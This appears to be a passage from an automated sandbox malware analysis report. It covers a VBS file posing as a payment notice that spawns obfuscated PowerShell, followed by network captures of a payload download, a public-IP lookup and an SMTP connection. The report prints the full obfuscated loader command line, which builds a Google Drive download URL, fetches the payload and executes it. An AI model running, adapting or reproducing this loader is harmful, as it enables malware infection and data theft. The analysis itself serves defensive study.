                                                      2024-10-24 06:47:02 UTC4916INHTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="XtOVjqrw57.bin"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 243776
                                                      Last-Modified: Thu, 24 Oct 2024 00:18:17 GMT
                                                      X-GUploader-UploadID: AHmUCY3ohLBjbtdHQtpFNehdofWCMWKonhc-Hs6TUszfZfulaUQvl-ziQf4hsxLQYy-8TLfx9L8sDHNVUw
                                                      Date: Thu, 24 Oct 2024 06:47:01 GMT
                                                      Expires: Thu, 24 Oct 2024 06:47:01 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=YGL3kw==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
                                                      2024-10-24 06:47:02 UTC4916INData Raw: fc 93 23 4b 54 0d 8a 18 f1 8d f3 33 16 00 84 88 b8 da 24 80 df 94 b9 b7 2f af 2b 91 d0 27 cb 7f 6e 7d 67 11 bd 5e 29 a1 06 3a 32 21 e1 0d 84 75 32 88 2c 85 75 7d af 40 04 37 9d 85 fe 2f 76 27 19 34 e4 97 f0 4c 03 d6 18 a2 94 52 c0 2e 3c 52 6a b3 86 60 2e 0d 51 ec 9b 69 69 7f 2d df d7 0f 11 83 74 8c 34 f1 5a 3b 63 5a a4 88 d8 3a b9 2e b1 b7 13 71 87 aa 90 13 49 25 e6 51 90 90 bf d7 74 cb e1 77 77 b1 e1 12 48 64 d6 c2 e8 30 05 26 8b e4 f6 8a 8d 72 71 00 ed d7 a5 64 a3 3e 38 df 04 e3 07 b1 d2 a8 f5 f6 e2 a1 8d ff 15 73 79 f8 64 97 56 9c ef b4 b5 3a 07 ab 7c 8a 46 e1 88 7e 24 8b 5c f7 74 8b 3b a8 16 76 70 2b 5a d8 ec 9d 19 14 ea c7 64 1b 2b 2d 09 32 db bc cd e8 c9 f2 4a 73 77 ca b7 8a 22 52 14 5e 58 22 dc f9 61 3e 36 7c 36 06 89 39 02 96 e7 93 38 08 93 11 ae
                                                      Data Ascii: #KT3$/+'n}g^):2!u2,u}@7/v'4LR.<Rj`.Qii-t4Z;cZ:.qI%QtwwHd0&rqd>8sydV:|F~$\t;vp+Zd+-2Jsw"R^X"a>6|698
                                                      2024-10-24 06:47:02 UTC4866INData Raw: 9b f2 8c 5b 7e 28 67 1f 53 94 1a 8b 1c 26 4c 6c 09 9d ab 7c ca ef 4b dd f7 6d 2c c4 1b 96 42 ac fe e5 b9 ee 35 af ee 93 d3 95 4b d6 33 ff 3c dd e6 c9 b9 50 d8 e0 fe 01 03 a6 56 53 f7 a1 7d 3c af b4 26 5e f8 ea b9 34 b5 c3 8f 1b 82 00 e5 ae ca 3f ef 5f 81 a5 f1 a0 51 b7 0b bb 43 48 b0 a0 20 8f 13 57 3e e1 55 e1 45 0f 67 ee a4 0b eb 23 9b 21 06 15 09 e4 95 5d a4 42 ff 37 23 6b 3e ed c7 dc 36 2d c1 4c 09 a0 63 3c 8d 03 c4 48 c1 23 27 ba f3 84 72 5c 6c 17 0f e0 5b e1 f1 32 15 27 ce 81 20 3b d4 68 35 f5 44 e9 d1 07 5c a9 7e cc 0d 78 2a 5e 01 8d be f5 ae c7 f5 a0 0f 88 63 9b 5f 0a e4 0f 8c 72 24 5e 1e 6a 1d 39 66 ee cf f2 c0 88 87 4d 23 12 42 77 fd 73 18 21 17 90 b6 ba 27 01 c1 7a 77 e0 e2 65 a4 1f 98 d7 d0 f1 01 7a 50 ec 7f 03 2a 68 a8 c2 21 67 8d d9 82 f5 a7
                                                      Data Ascii: [~(gS&Ll|Km,B5K3<PVS}<&^4?_QCH W>UEg#!]B7#k>6-Lc<H#'r\l[2' ;h5D\~x*^c_r$^j9fM#Bws!'zwezP*h!g
                                                      2024-10-24 06:47:02 UTC1324INData Raw: af 2e 4f 08 f7 65 f5 80 c5 a3 14 ce fe 71 8f b8 75 8c 01 1b 51 7e 8c cb 53 d6 38 22 75 0d 11 2f 90 e1 c1 e3 6c 75 be 32 cc 05 ad ca 3a 46 28 d8 62 a4 26 be 4c 51 3a 50 8c 5a 4d 4c d3 57 cf 6c 12 4f e5 2f 21 a0 46 a9 fb bf 7b 28 b2 7a ff 6f 01 17 86 c5 6b b0 5a 97 6f d4 9b fb 9c 09 c0 61 a1 ce 78 fe 44 47 25 01 d7 ad e5 77 4e d7 e6 ef 18 2c ae c4 2f ff 8a 66 6e c9 39 d6 56 68 0f f0 d0 d0 c8 15 e6 2b 24 de 2e c6 26 51 3c 58 3d 69 39 b0 54 bd eb 83 a2 4f 23 26 0a b0 b3 25 b1 53 a7 10 49 8c 8e 8a 8a fe ea e1 65 7a a4 f6 e3 b2 27 57 a3 30 00 8f 61 1b c6 96 73 db c4 a3 52 68 60 9c ae f0 c4 3d 05 ac b2 26 50 32 ac d0 ee 06 54 9f 1d 02 d1 ab 5d 27 fa d1 09 5f ed bc 02 81 d5 5b d5 0c 7d 0f 37 f0 cb 59 70 52 a9 d4 df a7 45 2e 6e 3b a8 fc d4 d8 a6 b1 ac cd d9 13 ff
                                                      Data Ascii: .OequQ~S8"u/lu2:F(b&LQ:PZMLWlO/!F{(zokZoaxDG%wN,/fn9Vh+$.&Q<X=i9TO#&%SIez'W0asRh`=&P2T]'_[}7YpRE.n;
                                                      2024-10-24 06:47:02 UTC1378INData Raw: f7 bd d5 85 cd 64 ea d8 fc d8 e7 07 7c a8 da 1d 02 f5 cb 55 b8 83 e7 23 94 7a a4 cf 99 69 86 8e 4b 3c 49 26 2b 8e 8a 1d 3d 36 57 c9 dc 9e 36 45 f6 dc 55 e3 13 ae 76 31 85 a2 3e 71 68 a5 44 14 3e f4 cf 34 42 bc 15 e5 72 1a 2a 74 f1 c6 a3 af 7d cb 09 33 5e 97 87 30 2e c5 10 0b a7 df a0 26 1e f7 8d 12 6a f7 ba 21 06 df 62 58 f6 d4 97 af d3 a6 aa 4c 47 9a 20 6a 95 a8 e5 e6 b7 95 dd 89 3e c9 c4 07 29 30 a6 52 34 b0 67 81 ef ec f9 14 8d c0 ce 36 79 a7 75 4e fe 61 5b 85 24 22 2d d4 8c 71 c6 ac 30 aa 38 5f e2 03 99 15 6e 30 03 67 19 ee 6b 2e 1c 4d 08 82 94 57 de 30 fa 3e 6f 6b c8 3e 1d 0a 56 6e ef 97 f3 4c 0b d6 1c b3 b4 52 3f d1 3c ac dc b1 86 58 7a 0d 51 ec db 97 65 7d 2d ff d6 0f 11 83 8a 8d 0d e3 5a 3b 63 7a a4 88 d8 3a 47 20 b1 b7 33 73 87 aa 90 ed 47 27 e6
                                                      Data Ascii: d|U#ziK<I&+=6W6EUv1>qhD>4Br*t}3^0.&j!bXLG j>)0R4g6yuNa[$"-q08_n0gk.MW0>ok>VnLR?<XzQe}-Z;cz:G 3sG'
                                                      2024-10-24 06:47:02 UTC1378INData Raw: 82 fe eb 57 c6 03 b4 7d 83 a5 f1 5e a3 b1 32 1a 41 48 b0 5e d2 8f 2a d5 30 e3 55 19 b7 01 65 81 0f 07 e9 29 17 2e 07 15 87 95 a5 5c cb 10 01 3b 2b 95 18 e0 c7 e4 82 5f d4 4c f7 dc 4e 29 e2 54 ce b6 c5 de 29 46 fe 79 7e 2c 75 65 c7 94 73 87 9e 6a 1f 55 85 ee 09 4b fc 75 5a ac 4e 94 f4 74 be a9 80 b0 27 22 58 13 0b b4 e9 88 9e c6 0b a8 f3 84 13 95 a4 03 94 60 bb 6a 24 54 7b 3e 2f 38 6c 85 6a fe c2 82 9a 4e 26 12 38 38 af 73 18 2b d3 d7 b2 ba 27 01 c1 7c 77 b2 2e 61 a4 6f 09 8e e9 d7 0b 15 79 9e 2a 09 45 41 80 c8 2b 15 a1 f4 8a 85 c8 af 39 d3 9b 98 23 eb 17 ae 0b 12 f8 54 8c 60 a0 69 95 55 e4 99 c6 04 6a d4 cc 72 5c b9 89 e8 a4 03 a2 e6 6a bb 6c 29 bc 95 88 72 f1 6d f4 8a 16 28 b4 dc 97 3b ec 78 6b 8f 0e 11 4e d9 fc 66 dd 24 a6 da 19 aa 44 0d 7d f0 d8 e1 31
                                                      Data Ascii: W}^2AH^*0Ue).\;+_LN)T)Fy~,uesjUKuZNt'"X`j$T{>/8ljN&88s+'|w.aoy*EA+9#T`iUjr\jl)rm(;xkNf$D}1
                                                      2024-10-24 06:47:02 UTC1378INData Raw: 87 89 ad 68 f2 7f e4 6e 1d cf 8e 29 0d 7e dd a2 84 03 25 40 82 31 3e 87 4e 2e 29 f9 01 cd d1 36 a6 38 e3 2c 31 e0 68 78 73 8a 72 58 49 a3 b0 6d e7 9c d3 ae 3f 3e 05 de 64 a0 e9 02 5f 47 73 2f fd bb 76 fa 65 e7 47 bb 60 6e 08 e0 6c 63 04 e3 24 ef 13 51 19 7c 20 52 21 85 94 dd db 26 50 c9 9d ef 16 2e 9f e6 24 3c 7d bf c1 ed 9a 17 77 ba e9 0e 76 70 1a e6 7a b5 df 36 95 c0 bd 84 66 af 7f 83 2d e4 4e 7e a5 fc e5 7a 18 28 b3 48 39 d4 f7 f8 95 49 69 53 1d 22 4f ca 33 47 ff 16 b1 0a 73 70 09 0d bf fb 46 cf 96 13 6a 4d 62 e4 d6 ab d6 ce a9 1b 52 a4 5a 90 f8 1b aa 1e 86 ec fb 13 7b d5 ca ce e9 c6 5c 04 e4 c1 5e 37 21 fc 4e ff 34 70 53 59 e1 e9 97 26 18 e2 4d 1f 12 a3 63 93 af 7f f9 8f c0 ea df ae 0e 48 ac a9 59 23 a9 4c a7 71 b4 8e 51 a7 f2 8e 57 30 09 5c 56 56 43
                                                      Data Ascii: hn)~%@1>N.)68,1hxsrXIm?>d_Gs/veG`nlc$Q| R!&P.$<}wvpz6f-N~z(H9IiS"O3GspFjMbRZ{\^7!N4pSY&McHY#LqQW0\VVC
                                                      2024-10-24 06:47:02 UTC1378INData Raw: 3d cc 39 a8 d6 cb 1f 44 ff d5 fb f7 c3 39 99 bf a6 86 3f d4 da f5 23 b5 4d e4 02 cf a6 e4 92 ec 95 20 ff b8 fc 44 55 b2 bd 12 7f e5 2a 29 fb de 7e 51 a8 f0 62 e0 35 31 43 6c b1 21 81 ca 58 a3 70 ae 0b 4e 5b 75 f2 97 63 64 ff 54 88 49 3c 35 61 3d 75 ca af 26 21 bd de 06 52 f8 39 16 f4 1d f2 7e a8 2c d7 da 91 2d 0c c1 21 b1 cd 13 fa 5f 22 57 2d 7c f0 62 f3 cb 89 cf 03 f4 a2 1e 52 d5 ba 9c e8 d3 3e 89 1d 7e 45 de 0c fc 03 f3 76 b8 52 f8 0c be 18 2f cf d7 ae 15 66 ce 19 e5 13 34 8f c9 2e 4f f2 87 09 f5 80 31 87 7d ce de 6e b6 87 75 72 00 02 5d 7e 8c cb 95 2b 3a 22 75 d3 0b 2f 90 c1 3f ed 60 75 40 cd f9 03 ad ea 34 46 08 d9 9c a5 1f 5b 42 51 3a ae 7e 52 4d 64 cd 54 cf 66 9e f3 e4 16 25 5e 48 a9 c3 9a 74 28 b2 42 6e 9e f2 e8 ac 30 57 be 5a cc 74 d4 9b fa 62 08
                                                      Data Ascii: =9D9?#M DU*)~Qb51Cl!XpN[ucdTI<5a=u&!R9~,-!_"W-|bR>~EvR/f4.O1}nur]~+:"u/?`u@4F[BQ:~RMdTf%^Ht(Bn0WZtb
                                                      2024-10-24 06:47:02 UTC1378INData Raw: 1b 4c d3 05 64 63 f7 86 07 1f b0 ab 35 78 49 e1 b7 7b 85 26 6d 49 77 44 c1 8c 76 15 47 e5 65 e0 78 4d b8 5b 24 a5 4a 6c a3 ab a3 e6 2d ee ff 5d 03 e4 51 3b bd d8 34 36 4f a9 79 2f 3d e4 ef f2 11 de bf 64 88 66 10 75 3c 2c 79 3f e1 36 a4 b8 66 fd eb ed 10 e0 04 22 99 ef 55 fd c3 6d ff fc 51 d1 21 1f 8b 12 fa d6 97 68 4d f7 9d 2e 8b cd 64 14 27 c9 f1 e7 27 78 56 d3 1d fc 8f 85 4c b8 87 19 07 b9 7a 5a c5 a0 49 ae 9e 4b 1c 4e 06 2b 8e a0 3d 06 09 57 c9 22 b0 30 45 f6 22 a7 ed 11 8e 73 cf 89 a0 c0 50 51 bc 44 14 c0 dd db 3e 42 ba 2c c5 52 1b 2a 54 f0 38 ad ad 57 eb f1 3f 5c 97 59 39 2e c5 10 0b aa e6 a5 06 18 f7 b5 17 94 f6 83 00 bf 21 9d 8f cc fe 97 ba da e7 aa 62 45 ba 21 79 95 a8 de e6 b0 95 dd 89 3e c9 c6 07 11 d4 a8 52 34 90 99 8d ed ec 27 13 b4 ca ce c8
                                                      Data Ascii: Ldc5xI{&mIwDvGexM[$Jl-]Q;46Oy/=dfu<,y?6f"UmQ!hM.d''xVLzZIKN+=W"0E"sPQD>B,R*T8W?\Y9.!bE!y>R4'
                                                      2024-10-24 06:47:02 UTC1378INData Raw: 6d 86 e8 e4 0e 7b ba 49 e0 f0 2e f7 67 4d 89 9d 50 11 48 51 6e 6b d9 a3 ed 0b 18 a8 48 0a fd 9b f2 72 5a b9 3e 5e 15 53 6a 13 8a 3c 07 69 6c 09 63 e5 8a ca ef b5 f1 e8 6d 0c c8 e5 98 42 52 ff 22 b0 ee 35 8f 8d 96 d3 95 b5 ef 58 23 c3 22 cc 37 b0 50 cb f5 83 75 50 a7 52 21 83 a7 7d 5d a7 a8 26 5e f2 69 c3 30 b5 ff 90 46 82 00 e5 ae c8 3b ef 7f 7d a9 f1 a0 8f e4 32 3a 43 b6 b1 67 0e 8e 13 24 cf ea 55 e7 9e 7a 11 ee 5a 03 9b a1 ef 20 76 3d 65 99 a4 56 d9 32 01 3b 25 4b 45 e5 c7 dc ce 51 d4 4c 09 2e 47 29 8d 23 f5 b6 cf 20 d9 45 c7 8d 72 2e 75 3d 2f ac 73 f7 f1 cc 11 55 8f 81 de 47 fc 7f 15 e5 4e 94 fe f8 5d 94 a2 c0 0f 78 a6 1a 01 8d eb f3 ea c6 f5 a0 83 08 67 9b d1 2b f8 0f e3 60 59 2a 14 17 2b 18 77 ea 31 fe 3c 86 e8 54 23 ec 44 57 fe 53 21 21 e9 9e 4c bb
                                                      Data Ascii: m{I.gMPHQnkHrZ>^Sj<ilcmBR"5X#"7PuPR!}]&^i0F;}2:Cg$UzZ v=eV2;%KEQL.G)# Er.u=/sUGN]xg+`Y*+w1<T#DWS!!L
                                                      2024-10-24 06:47:02 UTC1378INData Raw: 0c 5d 37 6f f0 cb a7 8f 6a b0 f6 df a7 bb dc 63 3b 78 d1 af ac a7 99 e8 bf 2f 1f d7 af 67 28 99 74 9b ba 92 65 89 fc 03 c5 3f aa 91 48 8d 51 27 fd a1 fd e3 54 41 b8 a9 00 31 de 4b dc 17 4c ff 41 94 69 6b 4e 57 7d 15 56 74 56 ac e2 e6 b6 0a b9 4c 4e d3 6a 88 d7 b0 86 67 98 99 71 c2 4e 5e d4 6c 4d fc 14 28 35 1c 24 ca 17 be 96 88 13 86 81 e8 6b e3 38 87 28 f3 5f cc a2 ac 51 51 54 84 5e 48 79 40 26 01 c5 05 cd db 4b 2c 36 e0 28 11 74 64 7b 73 54 79 58 49 a3 b0 60 de 8a f3 8d 3f c0 09 20 65 67 ef 03 5f 07 2c 0f d9 bb 56 fc 9b e9 47 45 6e 93 04 e0 92 4f 6f e3 04 ee ed 50 20 aa 21 6b 37 7b 9d dd 25 07 00 c9 e6 8d e8 27 9b 18 02 71 7d 9f c5 cd 9a 17 89 b4 14 0f 29 b7 d3 1d 85 6a fb 5f 95 c0 43 7b 51 8c 7f 83 d3 16 47 7e 85 d5 81 7a 18 d2 4c 7d 19 d4 09 f4 6a 40
                                                      Data Ascii: ]7ojc;x/g(te?HQ'TA1KLAikNW}VtVLNjgqN^lM(5$k8(_QQT^Hy@&K,6(td{sTyXI`? eg_,VGEnOoP !k7{%'q})j_C{QG~zL}j@


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.549902104.26.12.2054433116C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-24 06:47:03 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-10-24 06:47:03 UTC211INHTTP/1.1 200 OK
                                                      Date: Thu, 24 Oct 2024 06:47:03 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 14
                                                      Connection: close
                                                      Vary: Origin
                                                      cf-cache-status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 8d7803680d0a2cb4-DFW
                                                      2024-10-24 06:47:03 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31
                                                      Data Ascii: 173.254.250.71


                                                      SMTP Packets

                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Oct 24, 2024 08:47:09.851226091 CEST58749935202.71.109.165192.168.2.5220-tiga.pelayanweb.com ESMTP Exim 4.96.2 #2 Thu, 24 Oct 2024 14:47:07 +0800
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Oct 24, 2024 08:47:09.851680040 CEST49935587192.168.2.5202.71.109.165EHLO 830021
                                                      Oct 24, 2024 08:47:10.769637108 CEST58749935202.71.109.165192.168.2.5250-tiga.pelayanweb.com Hello 830021 - 173.254.250.71 - [127.0.0.1]
                                                      250-STARTTLS
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-AUTH PLAIN LOGIN
                                                      250 HELP
                                                      Oct 24, 2024 08:47:10.769804001 CEST49935587192.168.2.5202.71.109.165STARTTLS
                                                      Oct 24, 2024 08:47:11.148596048 CEST58749935202.71.109.165192.168.2.5220 TLS go ahead

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:02:46:06
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs"
                                                      Imagebase:0x7ff6e8900000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:02:46:08
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreewYUnd,sPUnredRUrinro SubjtYrke,OHunknCSportO inoll,eris Carci=Tribr Teglh[CylinnUds iETunnatDeluc. ugtaSUrstre P rocHofstuOrdfrrArmgaIDagmatB.sunyTonetpUnm.rrEtheroEncumtIstanOProtecTelemoLiannLNewfoTUnsphy LepipRejs,eForgi]Bru,s: Diff:Voca,tI pudl Til.sGanga1Efter2 Veks ');$dyrlgeforeningens=$Afmattede[0];$vang=(Efterbevilget 'Knkbr$An imGUnideLOpistO dataBEnth aMaglelBootm:FletkpHisseRNarraePellaaEjvindAfskrvBerkee ataoRFaks THa,seEPleisn Shu,CBacalY aram=SeksanTmmereD,llsw ieti-PingeODeviaBRetfrjPalaeeBriquc Era TArbej PejakS ammeyUdpnsS count Opile Remam E,ik. P,liNAnbraeInfratBetal. Hjr WRenowEBed abPineccKontoLEklipI trkuEKil.gNBristtB.nde ');Rationaliseringsgevinsten ($vang);Rationaliseringsgevinsten (Efterbevilget 'Tentk$ amenPNo.corRet aeOversaTal,sd Formva tmaeAromerB rtltSystee tilln enfrc jlpeyHverd.OlenoHProfie ittia IndtdWineseSubnerShi,ts Peda[avlsd$ aidLfelsoainvacu aanl UnexaSpedau Stri] uns =Flues$ Te ePE sperAnalfoStyrtvErym oA agyk MultaOesopt Sci rVilje ');$Lensmen=Efterbevilget 'Bu.dm$RespeP BackrSk aae VintaOps gdBrugtvtvisteNarkorDoctotAnti,eCellun.unolc GilbyU,lng.OversD ondoStroswTappanMaa el EfteoHelheaAbrazdSpigeF OrkniEnvellSannheKir r(Vntes$Afslud,nderyYnglerStersl AmatgLotteeTimevf tagoKas.rr.onexeAtombn egrniNattenPrs igFrikaeGiantn peresplant,Lnudv$billensme ed EksplPreoba BlomnInderdCrappe KonsnReolsd Se,eeTarsosPerso)Bug,e ';$ndlandendes=$Placeholders;Rationaliseringsgevinsten (Efterbevilget ' Ud a$CacheGUnvanl InstOCoryzban,spACa.cel.rein:Gl,ucRVagtkE .yttSSigtvHEksklvAfvaneTelemrChiliV ,limESerriN ResuESaf e=Bevis(GrounTOphjnEforansKsersTOpbyg-UnjagPHigdiAR evatPlanfHSelen Nonvi$Pee eNKaffeD BiotLTri,ha S olnSphendun,aseLareeNdydspdGastre reinsDemer) rem ');while (!$Reshvervene) {Rationaliseringsgevinsten (Efterbevilget 'Intra$BefstgBndsllFrugaoRepe bFoldeaCurr lTospr:S,lekTCeru r UklaeKistetUnpr tI dtseSylten FiltaIssk,aRygmar scifStipudSpielsFraileMultilSensisMis edMindsaTankegboldjeB.tra=Arqua$StjertThorarO givu traneB.lec ') ;Rationaliseringsgevinsten $Lensmen;Rationaliseringsgevinsten (Efterbevilget ' atrosRessoT colya yaerR DragTKardi- MellSDevotlDrsp E arvee angp D.ce ispe4 uld ');Rationaliseringsgevinsten (Efterbevilget 'Delim$Sl gmGBetonl ElemOW.iribtemp,APrayeLTjmo.:Prci rever E AerosBe stHSk ndvGalatEBarberBillyVYu upEFrimnnbaledEKisss=Arbut(Moya TCatureapplaS Sat.TRe de- nlupFryseaUneratDeterHSynde F.ter$S atsnGedesdGr.ssLShi aaDetalNFiftyDF siue Sp,in UndrDKunstEB rrishjem )Grupp ') ;Rationaliseringsgevinsten (Efterbevilget ' Mods$PilkegGleamlMil eoLkagebMaculaSminkL T ls:GodstSudrejvAftr IErythNA ditg ForrtPrepra,npresCopa KParagEFortinUndem4 ill= Umaa$BandwgTid sLBanegOUnca.b MiniATorsilUltra:LemmaAAgioed QuasrKenloeEconos lantSLiveteKobbeK paahAUmbe t BrysAD sseL Mid.O F ruGNiece+Syll +Overr%Ps.ro$ AnchA HuskfKesslm BrosAUshert HuslTStienESleepDDyrknEUncon.,ndercSkeweO.rencuTr.chn BrepTUfejl ') ;$dyrlgeforeningens=$Afmattede[$Svingtasken4];}$Fastgroede=329859;$Untraditional=31905;Rationaliseringsgevinsten (Efterbevilget 'Preex$Ba,gaGFuldhLSkrifODis eBhemmeaFlit L Z,la:SnverDRi gsEAdganNSa rrTDyrehe .kspRloko Opp,r= Bico llebrgFeltpechevrtCho b-Odin cErgoto V riNNaigitBaro E,estuNFirest Suto Slad $PreacN CharDFilovL F.rmA CompNBulledKommeEAff.aNBgegrdPlacaeNuragsExhal ');Rationaliseringsgevinsten (Efterbevilget 'Vvest$TangogO dunlO,reroM,skibPosteaAmb,slI.pos:Fi keVMikroenybodntinglsCapack Charain esbSko aestu,stRea i Forpl=Re li Nonsl[Ba.beSS aady Si is TruntBumbleKun emT phu.teen C FossoMindsnGenklvS.vbreCu,arrT.nontJul,b]Grapi:N,egt:PlanlFUnbewrGliddo RegimGramiBSprngaRaadisT opieVinte6 acre4 UnthSLsnintcuriarUnshiiTransnAnordgE sek( Fadl$L ninDPrebeeOutprnTuri t ajaveServirtrans)sen l ');Rationaliseringsgevinsten (Efterbevilget 'Micro$StudsGbaobaLDis.aoSube bFil yASbaikLBorts:Arrhyp ytiANonplpSal,saMorg LBankeIAlluvZFiltea V.tatEm ndiDa seo Tra,n Flot Gr.na=Inter A gna[SgerksLandsySpie,sGrundT verE BuddMKdben.Br.lgtGstfreWilfuXM,lenTUnsla.Kna.sEPlateNsa meCSalicOata iD AmouI.ndelnErhv.g Samm]Count:Gummi:CrenoaK,aliSStar.Ckr gsI AttriHaan .CentrG UdskEStyret Pr.iSIntertd.skeR HodoiSl gtnE,surgHalvg(Koal $Trkk VVejr 